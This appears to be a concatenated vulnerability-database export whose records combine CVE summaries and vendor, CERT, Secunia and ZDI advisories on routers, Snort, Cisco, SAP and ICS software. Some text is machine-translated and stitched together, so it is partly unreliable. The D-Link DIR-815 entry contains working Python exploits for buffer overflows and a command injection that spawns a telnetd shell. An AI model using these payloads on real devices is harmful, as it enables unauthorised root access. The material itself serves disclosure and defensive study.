var-202407-0779 Tenda i29V1.0 V1.0.0.5 was discovered to contain a hardcoded password for root. Tenda of i29 A vulnerability exists in the firmware regarding the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0778 Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/addWifiMacFilter. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0745 Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202305-1479 D-Link DIR-2150 SetTriggerPPPoEValidate Username Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20554. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202108-1158 A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.5. An application may be able to gain elevated privileges. apple's macOS There is a race condition vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-201109-0089 Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * full-disclosure@lists.grok.org.uk * comp.dcom.sys.cisco@newsgate.cisco.com Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates. Revision History ================ +----------------------------------------+ | Revision | | Initial | | 1.0 | 2011-September-14 | public | | | | release | +----------------------------------------+ Cisco Security Procedures ========================= Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at: http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at: http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-200702-0378 Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic. Snort IDS and Sourcefire Intrusion Sensor are prone to a stack-based buffer-overflow vulnerability because the network intrusion detection (NID) systems fail to handle specially crafted 'DCE' and 'RPC' network packets. An attacker can exploit this issue to execute malicious code in the context of the user running the affected application. Failed attempts will likely cause these applications to crash. The software provides functions such as packet sniffing, packet analysis, and packet inspection. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA07-050A Sourcefire Snort DCE/RPC Preprocessor Buffer Overflow Original release date: February 19, 2007 Last revised: -- Source: US-CERT Systems Affected * Snort 2.6.1, 2.6.1.1, and 2.6.1.2 * Snort 2.7.0 beta 1 * Sourcefire Intrusion Sensors version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 * Sourcefire Intrusion Sensors for Crossbeam version 4.1.x, 4.5.x, and 4.6x with SEUs prior to SEU 64 Other products that use Snort or Snort components may be affected. I. The DCE/RPC preprocessor reassembles fragmented SMB and DCE/RPC traffic before passing data to the Snort rules. The vulnerable code does not properly reassemble certain types of SMB and DCE/RPC packets. An attacker could exploit this vulnerability by sending a specially crafted TCP packet to a host or network monitored by Snort. The DCE/RPC preprocessor is enabled by default, and it is not necessary for an attacker to complete a TCP handshake. US-CERT is tracking this vulnerability as VU#196240. This vulnerability has been assigned CVE number CVE-2006-5276. Further information is available in advisories from Sourcefire and ISS. II. III. Solution Upgrade Snort 2.6.1.3 is available from the Snort download site. Sourcefire customers should visit the Sourcefire Support Login site. Disable the DCE/RPC Preprocessor To disable the DCE/RPC preprocessor, comment out the line that loads the preprocessor in the Snort configuration file (typically /etc/snort.conf on UNIX and Linux systems): [/etc/snort.conf] ... #preprocessor dcerpc... Restart Snort for the change to take effect. Disabling the preprocessor will prevent Snort from reassembling fragmented SMB and DCE/RPC packets. This may allow attacks to evade the IDS. IV. References * US-CERT Vulnerability Note VU#196240 - <http://www.kb.cert.org/vuls/id/196240> * Sourcefire Advisory 2007-02-19 - <http://www.snort.org/docs/advisory-2007-02-19.html> * Sourcefire Support Login - <https://support.sourcefire.com/> * Sourcefire Snort Release Notes for 2.6.1.3 - <http://www.snort.org/docs/release_notes/release_notes_2613.txt> * Snort downloads - <http://www.snort.org/dl/> * DCE/RPC Preprocessor - <http://www.snort.org/docs/snort_htmanuals/htmanual_261/node104.html> * IBM Internet Security Systems Protection Advisory - <http://iss.net/threats/257.html> * CVE-2006-5276 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5276> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA07-050A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA07-050A Feedback VU#196240" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2007 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History February 19, 2007: Initial Release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBRdop4+xOF3G+ig+rAQKdtAgAhQY66LRfVlNkH30Q5RI0gIo5Vhu14yDP qulLEyzjDhC7gDHWBGQYdE9eCy9Yf3P4BfKJS0766he/7CFn+BaDs7ohnXaynHQq +kMYNBMBg2RbrGKfOGRLHc0P6X1tSP3w45IppjOv9Yo5SUVDCa7beZWURCIKZyp6 OuYXtnpiGNctHgeU56US0sfuKj8qP7KOd9pCDRDQRhJ3UUd9wDpXee66HBxchh+w RSIQiMxisOX9mMYBW3z4DM/lb7PxXoa2Q7DwjM1NIOe/0tAObCOvF4uYhOLCVyNg +EbcN9123V0PW95FITlHXvJU6K8srnnK+Fhpfyi4vg5bYeEF2WiUrg== =T7v8 -----END PGP SIGNATURE----- . February 19, 2007 Summary: Sourcefire has learned of a remotely exploitable vulnerability in the Snort DCE/RPC preprocessor. Sourcefire has prepared updates for Snort open-source software to address this issue. Mitigating Factors: Users who have disabled the DCE/RPC preprocessor are not vulnerable. Recommended Actions: * Open-source Snort 2.6.1.x users are advised to upgrade to Snort 2.6.1.3 (or later) immediately. * Open-source Snort 2.7 beta users are advised to mitigate this issue by disabling the DCE/RPC preprocessor. This issue will be resolved in Snort 2.7 beta 2. Workarounds: Snort users who cannot upgrade immediately are advised to disable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic. After upgrading, customers should reenable the DCE/RPC preprocessor. Detecting Attacks Against This Vulnerability: Sourcefire will be releasing a rule pack that provides detection for attacks against this vulnerability. Has Sourcefire received any reports that this vulnerability has been exploited? - No. Sourcefire has not received any reports that this vulnerability has been exploited. Acknowledgments: Sourcefire would like to thank Neel Mehta from IBM X-Force for reporting this issue and working with us to resolve it. ------------------------------------------------------------------------- Take Surveys. Earn Cash. Influence the Future of IT Join SourceForge.net's Techsay panel and you'll get the chance to share your opinions on IT & business topics through brief surveys-and earn cash http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV _______________________________________________ Snort-announce mailing list Snort-announce@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/snort-announce . Resolution ========== All Snort users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/snort-2.6.1.3" References ========== [ 1 ] CVE-2006-5276 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201011-0225 Multiple stack-based buffer overflows in agent.exe in Setup Manager in Cisco Intelligent Contact Manager (ICM) before 7.0 allow remote attackers to execute arbitrary code via a long parameter in a (1) HandleUpgradeAll, (2) AgentUpgrade, (3) HandleQueryNodeInfoReq, or (4) HandleUpgradeTrace TCP packet, aka Bug IDs CSCti45698, CSCti45715, CSCti45726, and CSCti46164. The problem is Bug ID CSCti45698 , CSCti45715 , CSCti45726 ,and CSCti46164 It is a problem.By a third party (1) HandleUpgradeAll , (2) AgentUpgrade , (3) HandleQueryNodeInfoReq , (4) HandleUpgradeTrace TCP Arbitrary code could be executed via overly long parameters in the packet. Authentication is not required to exploit this vulnerability. The flaw exists within the Agent.exe component which listens by default on TCP port 40078. When processing the HandleUpgradeAll packet type an unchecked copy of user supplied data is performed into a stack-based buffer of a controlled size. Successful exploitation of this vulnerability leads to remote code execution under the context of the SYSTEM user. This may result in a compromise of the underlying system. Failed attempts may lead to a denial-of-service condition. ---------------------------------------------------------------------- Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM) Beta. Join the beta: http://secunia.com/products/corporate/vim/ ---------------------------------------------------------------------- TITLE: Cisco Intelligent Contact Manager Setup Manager "Agent.exe" Multiple Vulnerabilities SECUNIA ADVISORY ID: SA42146 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42146/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 RELEASE DATE: 2010-11-09 DISCUSS ADVISORY: http://secunia.com/advisories/42146/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/42146/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=42146 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Intelligent Contact Manager Setup Manager, which can be exploited by malicious people to compromise a vulnerable system. 1) A boundary error within Agent.exe when handling the "HandleUpgradeAll" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 2) A boundary error within Agent.exe when handling the "AgentUpgrade" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 3) A boundary error within Agent.exe when handling the "HandleQueryNodeInfoReq" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. 4) A boundary error within Agent.exe when handling the "HandleUpgradeTrace" packet can be exploited to cause a stack-based buffer overflow via a specially crafted request sent to e.g. TCP port 40078. Please see the vendor's advisory for the list of affected versions. SOLUTION: The vendor recommends to delete the Agent.exe file or restrict network access to the affected service. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: sb, reported via ZDI. ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 ZDI: http://www.zerodayinitiative.com/advisories/ZDI-10-232/ http://www.zerodayinitiative.com/advisories/ZDI-10-233/ http://www.zerodayinitiative.com/advisories/ZDI-10-234/ http://www.zerodayinitiative.com/advisories/ZDI-10-235/ OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . ZDI-10-232: Cisco ICM Setup Manager Agent.exe HandleUpgradeAll Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-232 November 7, 2010 -- CVE ID: CVE-2010-3040 -- CVSS: 10, (AV:N/AC:L/Au:N/C:C/I:C/A:C) -- Affected Vendors: Cisco -- Affected Products: Cisco Unified Intelligent Contact Management -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9915. -- Vendor Response: Cisco has issued an update to correct this vulnerability. More details can be found at: http://tools.cisco.com/security/center/viewAlert.x?alertId=21726 -- Disclosure Timeline: 2010-06-01 - Vulnerability reported to vendor 2010-11-07 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * sb -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi
var-201112-0297 Multiple cross-site scripting (XSS) vulnerabilities in the Virus Scan Interface in SAP Netweaver allow remote attackers to inject arbitrary web script or HTML via the (1) instname parameter to the VsiTestScan servlet and (2) name parameter to the VsiTestServlet servlet. The CTC service has an error when performing some verification checks and can be utilized to access user management and OS command execution functions. Inputs passed to the BAPI Explorer through partial transactions are missing prior to use and can be exploited to inject arbitrary HTML and script code that can be executed on the target user's browser when viewed maliciously. When using transaction \"sa38\", RSTXSCRP reports an error and can be exploited to inject any UNC path through the \"File Name\" field. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. TH_GREP reports an error when processing a partial SOAP request, and can inject any SHELL command with the \"<STRING>\" parameter. The SPML service allows users to perform cross-site request forgery attacks, and can log in to the user administrator context to perform arbitrary operations, such as creating arbitrary users. SAP Netweaver is prone to multiple cross-site scripting vulnerabilities, a path traversal vulnerability, an html-injection vulnerability, a cross-site request-forgery vulnerability, and an authentication-bypass vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, execute arbitrary commands in the context of the application, disclose sensitive information, perform certain administrative actions, gain unauthorized access, or bypass certain security restrictions
var-201507-0645 D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. A buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information Title: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import urllib import urllib2 # This exploits the auth_main.cgi with read buffer overflow exploit for v2.02 # prequisite is just to have id and password fields in params url = 'http://192.168.0.1/authentication.cgi' junk = "A"*1004+"B"*37+"\x58\xf8\x40\x00" # address of system function in executable junk+="X"*164+'echo "Admin" "Admin" "0" > /var/passwd\x00'+"AAAA" values = "id=test&password=test&test="+junk req = urllib2.Request(url, values) response = urllib2.urlopen(req) the_page = response.read() ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address) buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"H"*286 buf+= "\x40\xF4\xB1\x2A" # (ROP gadget which puts right value in A0) buf+= "B"*20+"ZZZZ"+"telnetd -p 6778"+"C"*5 # adjustment to get to the right payload buf+="\xA0\xb2\xb4\x2a" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection in ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 99.249.143.124\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';telnetd -p 9090;\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.1", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts will likely cause a denial-of-service condition. Versions prior to DOPSoft 4.00.04 are vulnerable
var-201809-0087 WECON LeviStudio Versions 1.8.29 and 1.8.44 have multiple stack-based buffer overflow vulnerabilities that can be exploited when the application processes specially crafted project files. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Wecon LeviStudioU. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of the UserMgr.xml file. When parsing the GroupList ID element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. WECON LeviStudio is a set of human interface programming software from WECON, China
